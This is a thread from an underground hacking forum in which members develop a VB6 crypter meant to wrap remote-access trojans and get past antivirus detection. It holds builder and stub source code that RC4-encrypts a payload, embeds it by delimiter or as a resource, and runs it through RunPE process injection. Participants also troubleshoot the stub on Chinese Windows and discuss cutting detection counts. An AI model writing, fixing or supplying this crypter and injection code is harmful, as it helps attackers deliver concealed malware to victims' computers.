HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

vb6 crypter on chinese windows

Status
Not open for further replies.
M

MasterVb6

Leech
User
Joined
Dec 16, 2014
Messages
138
Reputation
0
Reaction score
186
Points
43
Credits
0
‎10 Years of Service‎
46%
Hello, i found that vb6 crypters doesn't work on chinese windows when there's split function with delimiter, for it to work we need to avoid delimiter. I was tried to modify simple source code of vb6 to make it work on chinese windows but so far failed. I saw some crypters with resource  method but i cant figure out how its work. I Share the source code and if its possible someone to give me advice or modify.

Code: 
Private Sub Check2_Click()
CD1.FileName = ""
'cd2.Filter = "Icon Files (.ico)|.ico"
CD1.ShowOpen
End Sub

Private Sub Check3_Click()
CD2.FileName = ""
'cd2.Filter = "Icon Files (.ico)|.ico"
CD2.ShowOpen
End Sub

Private Sub Command1_Click()
With CD
    .DialogTitle = "Seleccione el archivo a encryptar"
    .Filter = "EXE Files |*.exe"
    .ShowOpen
End With
If Not CD.FileName = vbNullString Then
Text1.Text = CD.FileName
End If
End Sub

Private Sub Command2_Click()
Dim Stub As String
Open App.Path & "\ST.exe" For Binary As #1
Stub = Space(LOF(1))
Get #1, , Stub
Close #1
With CD

   .DialogTitle = "Seleccione donde guardar"
   .Filter = "EXE Files |*.exe"
   .ShowSave

End With
Dim file As String
Open Text1.Text For Binary As #1
file = Space(LOF(1))
Get #1, , file
Close #1
file = RC4(file, "therefenge")
Open CD.FileName For Binary As #1
Put #1, , Stub & "ChrW(&H4E00)" & file
Close #1


' Stub

Sub ZZZZZZZZZZZZZZZZZZ()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1

Dim CCCC() As String
CCCC() = Split(BBBB, "ChrW(&H4E00)")
CCCC(1) = RC4(CCCC(1), "therefenge")
Call runpe(AAAA, StrConv(CCCC(1), vbFromUnicode))
End Sub
 
In Chinese Windows, the problem with the Split function might be related to the way it handles characters. One possible solution is to avoid using the Split function and delimiters altogether. You can store the encrypted content in a resource file and then retrieve it at runtime.

Here's a step-by-step guide to using the resource method in VB6:

Create a new resource file:

a. In the VB6 IDE, go to the "Project" menu and select "Add Resource File".
b. Choose a name and location for the .res file (e.g., "MyResources.res").

Add a resource to the resource file:

a. In the Resource Editor, click the "Add Custom Resource" button (the one with a blue cube).
b. Set the "Resource Type" to a custom type, such as "ENCRYPTED_EXE".
c. Set the "Resource ID" to a unique identifier, like "101".
d. Browse and select the encrypted .exe file to add as a resource.
e. Save the resource file.

Add the resource file to the VB6 project:

In the VB6 IDE, go to the "Project" menu, click "Properties", and on the "Make" tab, add the .res file to the "Resource File" field.

Read the encrypted .exe file from the resource at runtime:

Instead of reading the encrypted .exe file with the Split function, you can use the LoadResData function to read the resource data.

Dim encryptedExe As Variant
encryptedExe = LoadResData(101, "ENCRYPTED_EXE")


You can now use the encryptedExe variable in the same way as you did with the Split method. Decrypt the content, and then use the RunPE method to execute the decrypted payload.

By using the resource method, you avoid potential issues with the Split function and character encodings in different Windows versions. This should improve compatibility with Chinese Windows.

 
Last edited by a moderator:
dEEpEst said:
In Chinese Windows, the problem with the Split function might be related to the way it handles characters. One possible solution is to avoid using the Split function and delimiters altogether. You can store the encrypted content in a resource file and then retrieve it at runtime.

Here's a step-by-step guide to using the resource method in VB6:

Create a new resource file:

a. In the VB6 IDE, go to the "Project" menu and select "Add Resource File".
b. Choose a name and location for the .res file (e.g., "MyResources.res").

Add a resource to the resource file:

a. In the Resource Editor, click the "Add Custom Resource" button (the one with a blue cube).
b. Set the "Resource Type" to a custom type, such as "ENCRYPTED_EXE".
c. Set the "Resource ID" to a unique identifier, like "101".
d. Browse and select the encrypted .exe file to add as a resource.
e. Save the resource file.

Add the resource file to the VB6 project:

In the VB6 IDE, go to the "Project" menu, click "Properties", and on the "Make" tab, add the .res file to the "Resource File" field.

Read the encrypted .exe file from the resource at runtime:

Instead of reading the encrypted .exe file with the Split function, you can use the LoadResData function to read the resource data.

Hidden Content

  • Give reaction to this post to see the hidden content.
You can now use the encryptedExe variable in the same way as you did with the Split method. Decrypt the content, and then use the RunPE method to execute the decrypted payload.

By using the resource method, you avoid potential issues with the Split function and character encodings in different Windows versions. This should improve compatibility with Chinese Windows.
Click to expand...
dEEpEstDeepest thank you for the answer, i dont know why i missed to read it yesterday,

 
Deepest

When you talking for all these steps, you talking that everything is happened in the stub, correct? In other words.

1.I load the uncrypted payload in the resources in the stub code, then i modify the code in the stub to read the uncrypted exe from the resources. When the stub is modified to read the uncrypted exe from the resource stub do other things like encrypt runpe etc.

After that, i just compiled the project, where the stub and uncrypted payload are together in already compiled file. No need of builder?

In other words, i just load the uncrypted exe file in the resources  in the stub, then i modify the stub to load the uncrypted file from resources, and then just compiled the stub project where now are both files- the stub and the uncrypted exe. And i dont need of builder, is it correct?

 
MasterVb6 said:
Deepest

When you talking for all these steps, you talking that everything is happened in the stub, correct? In other words.

1.I load the uncrypted payload in the resources in the stub code, then i modify the code in the stub to read the uncrypted exe from the resources. When the stub is modified to read the uncrypted exe from the resource stub do other things like encrypt runpe etc.

After that, i just compiled the project, where the stub and uncrypted payload are together in already compiled file. No need of builder?

In other words, i just load the uncrypted exe file in the resources  in the stub, then i modify the stub to load the uncrypted file from resources, and then just compiled the stub project where now are both files- the stub and the uncrypted exe. And i dont need of builder, is it correct?
Click to expand...
MasterVb6Yes, that's correct. By embedding the uncrypted payload in the stub as a resource, you eliminate the need for a separate builder to combine the stub and the payload. The steps I provided are for modifying the stub to include the payload as a resource, and then reading that resource at runtime to perform the necessary operations (e.g., encryption, decryption, and execution).

Here's a summary of the process:

Embed the uncrypted payload in the stub project as a resource.

Modify the stub code to read the payload from the resource, and perform encryption, decryption, and execution as needed.

Compile the stub project, which now includes both the stub and the payload.

With this approach, you don't need a separate builder, as the payload is already embedded in the compiled stub. Just make sure that the payload is included in the stub project as a resource, and that the stub code is properly modified to read from the resource and perform the necessary operations.

 
dEEpEst said:
Yes, that's correct. By embedding the uncrypted payload in the stub as a resource, you eliminate the need for a separate builder to combine the stub and the payload. The steps I provided are for modifying the stub to include the payload as a resource, and then reading that resource at runtime to perform the necessary operations (e.g., encryption, decryption, and execution).

Here's a summary of the process:

Embed the uncrypted payload in the stub project as a resource.

Modify the stub code to read the payload from the resource, and perform encryption, decryption, and execution as needed.

Compile the stub project, which now includes both the stub and the payload.

With this approach, you don't need a separate builder, as the payload is already embedded in the compiled stub. Just make sure that the payload is included in the stub project as a resource, and that the stub code is properly modified to read from the resource and perform the necessary operations.
Click to expand...
dEEpEstThank you Deepest, that's sounds great, do you think there's some alternative so i can use this method with some simple builder or it's impossible?
From what i understand, if i  want to use a couple rats, i need to load in the resources, but my idea is, if i can use this method (without split ) with some simple builder, and get each rat i want with app path & exename etc. 
 

 
why don't you just change the delimiter?

You can use a combination of ASCII characters, this will improve compatibility on different versions of Windows.

Put #1, , Stub & "||DELIMITER||" & file


CCCC() = Split(BBBB, "||DELIMITER||")


Some more ASCII delimiter options:

Code: 
	"||DELIM1||"
	"@@DELIM2@@"
	"^^DELIM3^^"
	"%%DELIM4%%"
	"&&DELIM5&&"
 
Last edited by a moderator:
dEEpEst said:
why don't you just change the delimiter?

You can use a combination of ASCII characters, this will improve compatibility on different versions of Windows.

Hidden Content

  • Give reaction to this post to see the hidden content.
Some more ASCII delimiter options:

Hidden Content

  • Give reaction to this post to see the hidden content.
Click to expand...
dEEpEstI've changed, it's work on Russian Windows Version and similar language, but it doesn't work on Chinese for example.

 
I think the problem comes from something like that.

This link is hidden for visitors. Please Log in or register now.


If you want to use a Unicode delimiter, you need to convert the delimiter to a binary representation that can be safely included in the .exe file. One way to do this is to use a combination of StrConv and ChrW functions to create a Unicode delimiter. Here's an example of how to create a Unicode delimiter:

Dim UnicodeDelimiter As String
UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)



Now you can use the UnicodeDelimiter variable as a delimiter in your code. Modify the builder code to include the UnicodeDelimiter:

Put #1, , Stub & UnicodeDelimiter & file



Next, you need to modify the stub code to split the content using the Unicode delimiter. You can use the InStr function to find the position of the delimiter in the binary data, and then extract the encrypted content using the Mid function:

Dim delimiterPosition As Long
delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)

Dim encryptedContent As String
encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))



Replace the Split method in the stub code with the new code that uses the InStr and Mid functions to extract the encrypted content.

By using a Unicode delimiter, you can reduce the chances of delimiter-related issues with Chinese Windows or other non-ANSI character sets.

 
Last edited by a moderator:
Deepest, than you for the answer, unfortunately I don't have the required rank to see the hidden content. I finnaly found time today to modify the stub code to work in Chinese WIndows. There's another problem, the output file comes very detectables.
 

Sub Main()
Dim res() As Byte
res = LoadResData(101, "CUSTOM")
Call memory(res, StrPtr(InjectIntoProcess), 0)
End Sub


As you can see there's no even need to use encryption function to work. So i tried to modify the code like this with encryption.
 

Sub Main()
Dim res() As Byte
res = LoadResData(101, "CUSTOM")
Dim CCCC As String
CCCC = RC4(CCCC, "therefenge")
Call memory(res, StrPtr(InjectIntoProcess), 0)
End Sub



So here i declare variable for the RC4 encryption function, but again as you can see, there's no sense to use like that, cuz the variable its not used when i call the runpe at all. I need to add the bytes there. So when i try to put "CCC" it doesn't work. Do you have any idea how to modify to crypt the rat, im using this RC4 Encryption function.
 

Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte
If Len(Password) = 0 Then
Exit Function
End If
If Len(Expression) = 0 Then
Exit Function
End If
If Len(Password) > 256 Then
Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
Key() = StrConv(Password, vbFromUnicode)
End If
For X = 0 To 255
RB(X) = X
Next X
X = 0
Y = 0
z = 0
For X = 0 To 255
Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
Temp = RB(X)
RB(X) = RB(Y)
RB(Y) = Temp
Next X
X = 0
Y = 0
z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
Y = (Y + 1) Mod 256
z = (z + RB(Y)) Mod 256
Temp = RB(Y)
RB(Y) = RB(z)
RB(z) = Temp
ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(z)) Mod 256))
Next X
RC4 = StrConv(ByteArray, vbUnicode)
End Function


And here is how the compiled stub and rat comes.
967e731a50f2aa71162ace164e8b0876.png


 
MasterVb6 said:
Deepest, than you for the answer, unfortunately I don't have the required rank to see the hidden content. I finnaly found time today to modify the stub code to work in Chinese WIndows. There's another problem, the output file comes very detectables.
 

Sub Main()
Dim res() As Byte
res = LoadResData(101, "CUSTOM")
Call memory(res, StrPtr(InjectIntoProcess), 0)
End Sub


As you can see there's no even need to use encryption function to work. So i tried to modify the code like this with encryption.
 

Sub Main()
Dim res() As Byte
res = LoadResData(101, "CUSTOM")
Dim CCCC As String
CCCC = RC4(CCCC, "therefenge")
Call memory(res, StrPtr(InjectIntoProcess), 0)
End Sub



So here i declare variable for the RC4 encryption function, but again as you can see, there's no sense to use like that, cuz the variable its not used when i call the runpe at all. I need to add the bytes there. So when i try to put "CCC" it doesn't work. Do you have any idea how to modify to crypt the rat, im using this RC4 Encryption function.
 

Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte
If Len(Password) = 0 Then
Exit Function
End If
If Len(Expression) = 0 Then
Exit Function
End If
If Len(Password) > 256 Then
Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
Key() = StrConv(Password, vbFromUnicode)
End If
For X = 0 To 255
RB(X) = X
Next X
X = 0
Y = 0
z = 0
For X = 0 To 255
Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
Temp = RB(X)
RB(X) = RB(Y)
RB(Y) = Temp
Next X
X = 0
Y = 0
z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
Y = (Y + 1) Mod 256
z = (z + RB(Y)) Mod 256
Temp = RB(Y)
RB(Y) = RB(z)
RB(z) = Temp
ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(z)) Mod 256))
Next X
RC4 = StrConv(ByteArray, vbUnicode)
End Function


And here is how the compiled stub and rat comes.
This link is hidden for visitors. Please Log in or register now.
Click to expand...
MasterVb6You are not assigning the loaded resource to the CCCC variable before decrypting it. You should fix the code like this:

Code: 
 Sub Main()
    Dim res() As Byte
    res = LoadResData(101, "CUSTOM")
    
    Dim CCCC As String
    CCCC = StrConv(res, vbUnicode)
    CCCC = RC4(CCCC, "therefenge")
    
    Call memory(StrConv(CCCC, vbFromUnicode), StrPtr(InjectIntoProcess), 0)
End Sub
 
Last edited by a moderator:
dEEpEst said:
I think the problem comes from something like that.

This link is hidden for visitors. Please Log in or register now.


If you want to use a Unicode delimiter, you need to convert the delimiter to a binary representation that can be safely included in the .exe file. One way to do this is to use a combination of StrConv and ChrW functions to create a Unicode delimiter. Here's an example of how to create a Unicode delimiter:

Dim UnicodeDelimiter As String
UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)



Now you can use the UnicodeDelimiter variable as a delimiter in your code. Modify the builder code to include the UnicodeDelimiter:

Put #1, , Stub & UnicodeDelimiter & file



Next, you need to modify the stub code to split the content using the Unicode delimiter. You can use the InStr function to find the position of the delimiter in the binary data, and then extract the encrypted content using the Mid function:

Dim delimiterPosition As Long
delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)

Dim encryptedContent As String
encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))



Replace the Split method in the stub code with the new code that uses the InStr and Mid functions to extract the encrypted content.

By using a Unicode delimiter, you can reduce the chances of delimiter-related issues with Chinese Windows or other non-ANSI character sets.
Click to expand...
dEEpEstDepest, thank you for the answer, can you confirm if the code below is correct? If so, im still faicing problems when i run the crypted file in Chinese windows, im getting "WerFault.exe" 
The delimiter in the builder is exactly as you said. 

 

Code: 
<hide>Sub ZZZZZZZZZZZZZZZZZZ()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1

Dim UnicodeDelimiter As String
UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)
Dim delimiterPosition As Long
delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)
Dim encryptedContent As String
encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))

Dim CCCC() As String
CCCC() = Split(encryptedContent, delimiterPosition)
CCCC(1) = RC4(CCCC(1), "therefenge")
Call runpe(AAAA, StrConv(CCCC(1), vbFromUnicode))
End Sub
</hide>
 
Last edited by a moderator:
Edit: i saw 
To see this hidden content, you must like this content.
Instead:
To see this hidden content, you must like this content.
although it still doesnt work

 
Code: 
Sub ZZZZZZZZZZZZZZZZZZ()
    Dim AAAA As String
    AAAA = App.Path & "\" & App.EXEName & ".exe"
    Dim BBBB As String
    Open AAAA For Binary As #1
    BBBB = Space(LOF(1))
    Get #1, , BBBB
    Close #1

    Dim UnicodeDelimiter As String
    UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)
    Dim delimiterPosition As Long
    delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)
    Dim encryptedContent As String
    encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))

    ' Decrypt the encrypted content
    encryptedContent = RC4(encryptedContent, "therefenge")
    
    ' Execute the decrypted payload using the RunPE method
    Call runpe(AAAA, StrConv(encryptedContent, vbFromUnicode))
End Sub
 
Last edited by a moderator:
dEEpEst said:
Sub ZZZZZZZZZZZZZZZZZZ()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1

Dim UnicodeDelimiter As String
UnicodeDelimiter = StrConv("||DELIMITER||", vbFromUnicode)
Dim delimiterPosition As Long
delimiterPosition = InStr(1, BBBB, UnicodeDelimiter)
Dim encryptedContent As String
encryptedContent = Mid(BBBB, delimiterPosition + Len(UnicodeDelimiter))

' Decrypt the encrypted content
encryptedContent = RC4(encryptedContent, "therefenge")

' Execute the decrypted payload using the RunPE method
Call runpe(AAAA, StrConv(encryptedContent, vbFromUnicode))
End Sub
Click to expand...
dEEpEst
Thank you for the answers Deepest, unfortunately neither method works. The method with the resources that u sent, and the method with unicode delimiter, im still getting "WerFault.exe"

I did simple test with  the unicode delimiter, in Engish Windows, and i got this. As you can see only  "|" displayed normally. So i try to use  only "|" in the delimiter, but it still doesn't work. I tried to convert "VbUnicode" and it still the same. The method with the resources is more weird even. I got the same error "Werfault.exe" but execpt that, i got the same detections about 15. even though it doesn't work should atleast the detections should be less, since the file should be crypted. Any ideas?

To see this hidden content, you must like this content.
 
I tried another characters. And its display correctly on both version of Windows English and Chinese, it's work on english, but its still doesnt work on Chinese. im assumed, since its display corectly when i made test in the chinese version.
To see this hidden content, you must like this content.
I removed even the encryption, ofcourse again works on english windows and it does on chinese
To see this hidden content, you must like this content.
 
Last edited by a moderator:
I'm running out of ideas. If you PM me the project I can try to fix it (but I don't promise anything).

One thing you say about when it works for you but has many detections 🤔 .... This is normal, the vb6 codes are highly exploited, how many years have they been running? The AV's have studied it very well and have many vb6 signatures. I think you have to modding it.

 
Status
Not open for further replies.
Back
Top